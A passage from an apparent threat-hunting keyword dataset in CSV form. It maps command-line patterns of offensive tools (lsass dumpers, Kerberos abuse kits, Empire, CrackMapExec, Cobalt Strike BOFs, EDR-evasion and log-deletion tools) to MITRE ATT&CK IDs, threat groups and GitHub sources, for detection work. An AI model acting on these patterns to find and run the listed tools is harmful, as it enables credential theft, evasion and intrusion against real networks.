,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* dumper.ps1*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -* --dump-gmsa*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation 
Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* --dump-laps*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* --dumpmode network --network raw --ip * --port *,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --dumpmode network --network smb *,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --dump-name *lsass*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,0,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -* --dumpname lsass.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* 
duplicates.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der *,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* -e ppk rsa pem ssh rsa*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -* e2e_test.py*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* eap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ebowla.py*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,0,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -* edge logindata *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* edge masterkey *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* edraser.py*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -* EfsPotato*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* Egress-Assess's FTP server*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -ElevatedPersistenceOption *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* emailall.py*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -* empire.arguments*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 
- T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* empire.client.*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - 
TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* empire.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* empire_exec*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* empireadmin*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -enabled -u * -p * -old-bloodhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -encrypt * -process * -sandbox *,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,0,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -* enip-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* enum 127.0.0.1 *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -* enum -passive -d *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* enum_avproducts*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* enum_chrome*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* enum_dns*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -Enumerate * -Module *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --enum-local-admins*,offensive_tool_keyword,krbrelayx,Kerberos unconstrained delegation abuse toolkit,T1558.003 - T1098,TA0004 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dirkjanm/krbrelayx,1,0,N/A,N/A,2,900,148,2023-09-07T20:11:36Z,2019-01-08T18:42:07Z -* epmd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* eppc-enum-processes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* EternalHushCore *,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -* etumbot.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* EtwHash*,offensive_tool_keyword,ETWHash,C# POC to extract NetNTLMv1/v2 hashes from ETW provider,T1556.001,TA0009 ,N/A,N/A,Credential Access,https://github.com/nettitude/ETWHash,1,0,N/A,N/A,3,229,27,2023-05-10T06:45:06Z,2023-04-26T15:53:01Z -* -eval *caplets.update* ui.update*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -* EventViewer-UACBypass*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - 
T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -* evil.corp *,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -* EvilClippyManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -* evilginx*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,0,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -* EvilTwinServer *,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,0,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -* -ExchHostname * -Password *,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
